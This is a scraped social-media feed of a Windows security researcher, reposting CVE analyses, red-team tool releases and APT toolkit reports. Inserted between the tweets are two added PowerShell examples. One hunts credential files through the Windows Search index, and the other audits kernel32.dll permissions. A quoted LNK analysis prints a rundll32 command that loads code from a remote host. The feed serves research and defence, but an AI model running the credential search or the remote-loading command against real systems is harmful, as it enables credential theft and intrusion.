FFE4
2.5K posts
@KernelDBG
I'm a virus analyst focused on Windows Security Research and Exploit Development.
Joined July 2016
3K Following, 292 Followers
FFE4 reposted
Alex Plaskett @alexjplaskett
An analysis of CVE-2026-21236, a heap-based buffer overflow in the Microsoft Windows kernel driver afd.sys, was just published by @ASN_Sinanju_06S, who was recently on secondment with my team, EDG! Nice work for her first triage of a kernel memory corruption bug! nccgroup.com/research/vulne…
FFE4 reposted
Melvin Langvik @Flangvik
This week’s video covers CVE-2026-24291, a Windows LPE nicknamed RegPwn by the team over at @MDSecLabs. As a part-time sloperator (Google it), I whipped up a quick RegPwn BOF, and in the video I demo it with Mythic and Apollo. Link below.
FFE4 reposted
Fady Moheb @N1NJ1O
Hunt credentials via LotL by querying the native Windows Search DB (OLE DB) directly. Inspired by @wunderwuzzi23, I built Invoke-WindowsSearch to automate stealthy extraction across AD.
- Script: tinyurl.com/549wrcyh
- Full methodology in my vault: tinyurl.com/549wrcyh
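The query pattern behind this technique, as an added example that is not the Invoke-WindowsSearch script linked above: it talks to the local Windows Search index through the Search.CollatorDSO OLE DB provider and runs Windows Search SQL against SystemIndex, so no files are opened by the caller and nothing touches disk. The keyword list and scope are constructed placeholders; the only assumption is that the WSearch service is running, which is the desktop default.

```powershell
# Added example (not the tweet's script): hunt for credential-related files via the
# local Windows Search index over OLE DB. Assumes the WSearch service is running.
function Find-IndexedCredentialFiles {
    param(
        [string[]]$Keywords = @('password', 'passwd', 'secret', 'apikey'),  # constructed sample keywords
        [string]$Scope = 'file:C:\Users',                                 # constructed sample scope
        [int]$Top = 200
    )

    # The Windows Search OLE DB provider; Application=Windows selects the SystemIndex catalog.
    $connString = "Provider=Search.CollatorDSO;Extended Properties='Application=Windows';"
    $conn = New-Object System.Data.OleDb.OleDbConnection $connString
    $conn.Open()
    try {
        foreach ($kw in $Keywords) {
            # Double any single quote so a keyword cannot break out of the query literal.
            $safe = $kw.Replace("'", "''")
            # CONTAINS(*, ...) matches indexed content (needs an iFilter for the file type);
            # System.FileName LIKE matches the name even when content is not indexed.
            $sql = @"
SELECT TOP $Top System.ItemPathDisplay, System.Size, System.DateModified
FROM SystemIndex
WHERE SCOPE='$Scope'
  AND (CONTAINS(*, '"$safe"') OR System.FileName LIKE '%$safe%')
"@
            $cmd = New-Object System.Data.OleDb.OleDbCommand $sql, $conn
            $reader = $cmd.ExecuteReader()
            while ($reader.Read()) {
                [pscustomobject]@{
                    Keyword  = $kw
                    Path     = $reader['System.ItemPathDisplay']
                    Size     = $reader['System.Size']
                    Modified = $reader['System.DateModified']
                }
            }
            $reader.Close()
        }
    }
    finally {
        $conn.Close()
    }
}

Find-IndexedCredentialFiles | Sort-Object Path -Unique | Format-Table -AutoSize
```

Two caveats a practitioner should keep in mind. Results are bounded by what the index already covers: by default that is user profile locations, and content matching only works for file types that have an iFilter installed, so a name-only hit (LIKE) and a content hit (CONTAINS) carry different confidence. The provider is local, so running this "across AD" means executing it on each host (for example over PowerShell remoting); on the defensive side, powershell.exe issuing SystemIndex queries is unusual enough on most estates to be worth a hunt of its own.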
FFE4 reposted
Volexity @Volexity
.@Volexity recently released GoResolver v1.4, bringing significant updates to our #opensource tool for recovering symbol data from obfuscated Go binaries. This release is available on GitHub: github.com/volexity/GoRes… [1/8]
FFE4 reposted
Hunt.io @Huntio
🚨 🇷🇺 NEW RESEARCH: Operation Roundish - Uncovering an APT28 Roundcube Exploitation Toolkit Targeting Ukraine
During infrastructure analysis, we identified an exposed server hosting what appears to be a complete Roundcube exploitation toolkit linked to #APT28 (#FancyBear) operations. Full technical analysis + IOCs here 👇 hunt.io/blog/operation…
Key findings:
• Open directory exposed 61 files across 36 directories containing payloads, tooling, and operator artifacts
• Toolkit targets Roundcube webmail for credential harvesting, mailbox exfiltration, and persistent mail forwarding
• 14 TTP overlaps with ESET's documented Operation RoundPress campaign
• Infrastructure targeting mail.dmsu(.)gov(.)ua (#Ukraine State Migration Service)
• Toolkit includes a Flask C2 server, CSS side-channel module, and a Go Linux implant (httd)
FFE4 reposted
Binary Defense @Binary_Defense
What if disabling Defender didn't require malware or exploits? A proof of concept shows how simple ACL changes to kernel32.dll can quietly stop security services from starting after reboot. Binary Defense researchers break down the technique and how defenders can detect it. Full analysis: binarydefense.com/resources/blog…
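One detection check a defender can run for the technique described above, as an added example that is not Binary Defense's code: it reads the owner and DACL of kernel32.dll (both the System32 and SysWOW64 copies) and flags anything that departs from the stock layout, namely an owner other than NT SERVICE\TrustedInstaller, any Deny ACE, or write-class rights granted to a principal other than TrustedInstaller. That stock layout is the assumption baked in here; on a host with vendor customization, compare the emitted SDDL against a known-good copy instead of the hardcoded expectations.

```powershell
# Added example (not Binary Defense's code): audit the ACL of kernel32.dll for the
# Deny/ownership changes that would keep services from mapping it at next boot.
# Assumption: stock layout is owner NT SERVICE\TrustedInstaller, no Deny ACEs,
# and only TrustedInstaller holding write-class rights.
function Test-SystemDllAcl {
    param(
        [string[]]$Paths = @("$env:SystemRoot\System32\kernel32.dll",
                             "$env:SystemRoot\SysWOW64\kernel32.dll"),
        [string]$ExpectedOwner = 'NT SERVICE\TrustedInstaller'
    )

    # Rights that let a principal alter or replace the file, or change its ACL again.
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Delete -bor
                 [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                 [System.Security.AccessControl.FileSystemRights]::TakeOwnership

    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $acl = Get-Acl -LiteralPath $p
        $findings = @()

        if ($acl.Owner -ne $ExpectedOwner) {
            $findings += "owner is '$($acl.Owner)', expected $ExpectedOwner"
        }

        foreach ($ace in $acl.Access) {
            $who = $ace.IdentityReference.Value
            if ($ace.AccessControlType -eq 'Deny') {
                # A Deny ACE on a core DLL blocks whoever it names from loading the file;
                # a service account that cannot map kernel32 cannot start.
                $findings += "Deny ACE for ${who}: $($ace.FileSystemRights)"
            }
            elseif ($who -ne $ExpectedOwner -and (($ace.FileSystemRights -band $writeMask) -ne 0)) {
                # Only TrustedInstaller should be able to modify a System32 binary.
                $findings += "write-class rights for ${who}: $($ace.FileSystemRights)"
            }
        }

        [pscustomobject]@{
            Path     = $p
            Owner    = $acl.Owner
            Suspect  = ($findings.Count -gt 0)
            Findings = ($findings -join '; ')
            Sddl     = $acl.Sddl   # raw form, convenient for baselining across hosts
        }
    }
}

Test-SystemDllAcl | Format-List
```

Running this on a schedule gives a point-in-time check; for a real-time signal, put a SACL on the file so that permission changes raise Security event 4670 ("Permissions on an object were changed"), and alert on that event for anything under System32 that is not a servicing (TrustedInstaller) operation.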
FFE4 reposted
Mr.Z @zux0x3a
I am releasing a new toolkit I built for IIS-based lateral movement and code execution within the memory of IIS worker processes. Phantom ASPX Loader & PhantomLink -- a two-part toolkit for reflectively loading native DLLs into IIS w3wp.exe worker processes via ASPX. github.com/zux0x3a/Phanto…
FFE4 @KernelDBG
@init1security CHM is a monitored extension for all EDRs.
Init1Security @init1security
Years ago, we used older macro-enabled techniques such as EarlyAPC and NtMapViewOfSection in our macros, but we have since fully transitioned to more "obscure" extensions and successfully applied them to CHM files. The Initial Access Framework has come a long way!! #redteam
FFE4 @KernelDBG
@HaifeiLi Can you share the sample?
Haifei Li @HaifeiLi
No idea who submitted this*, but this is a "zero-day but probably non-exploitable crash" that can be triggered on the latest WPS Office software (which is popular, especially in Asia), and there's a wild message in the sample, it seems to me (?). Since this is a non-exploitable crash and no payload was found, full disclosure soon. pub.expmon.com/analysis/31128… * EXPMON does not track any information about the submitter; it only receives samples. #expmon #0day #zeroday #wps #exploitdetection
FFE4 reposted
LAB52 @LAB52io
Check out our new post: PlugX Meeting Invitation via MSBuild and GDATA lab52.io/blog/plugx-mee…
FFE4 reposted
Daax @daaximus
Throwing out an updated IOCTL dump for up to Windows 26100+. Contains ~300 more than the previous. gist.github.com/daaximus/51c64…
FFE4 reposted
Akamai Security Intelligence Group @akamai_research
CVE-2026-21513 is already being exploited in the wild. Using PatchDiff-AI, we analyzed how a malicious .LNK can abuse MSHTML to bypass security boundaries and achieve code execution in activity linked to APT28. Full analysis: akamai.com/blog/security-…
FFE4 reposted
dmpdump @G60930953
This is a great find from @malwrhunterteam and a great observation from @marsomx_. The LNK breaks parsers. Next stage is likely 151784e447beb38f29a06cd03ac02897 (xa0.dll, which is " .dll"). It seems to copy/open a PDF in the Downloads folder, or creates a corrupt one if N/A.
Quoting Simplicio Sam L. @marsomx_:
@malwrhunterteam @smica83 It seems shell item + Property Store abuse. LNK points to the "God Mode" virtual namespace → forces shell to fall back to property store for execution. Hidden in property store: %windir%\system32\rundll32.exe \\cdn-static.space@80\1\J39E\,l 890690 idk, it's something expected..
FFE4 reposted
PatchPoint.Official @_patchpoint_
Notepad RCE (CVE-2026-20841) is getting a lot of attention. This is part of the content provided through our subscription. Check out our simple analysis and judge for yourself.😀 github.com/patchpoint/CVE… #notepad #RCE
FFE4 reposted
eversinc33 🤍🔪⋆。˚ ⋆
I promise this is the last tracer I post (now I've got everything covered that I usually analyze), but here is a little WinDbg driver tracer plugin I wrote to quickly analyze virtualized drivers. It logs module transitions, i.e. external function calls. :) github.com/eversinc33/drv…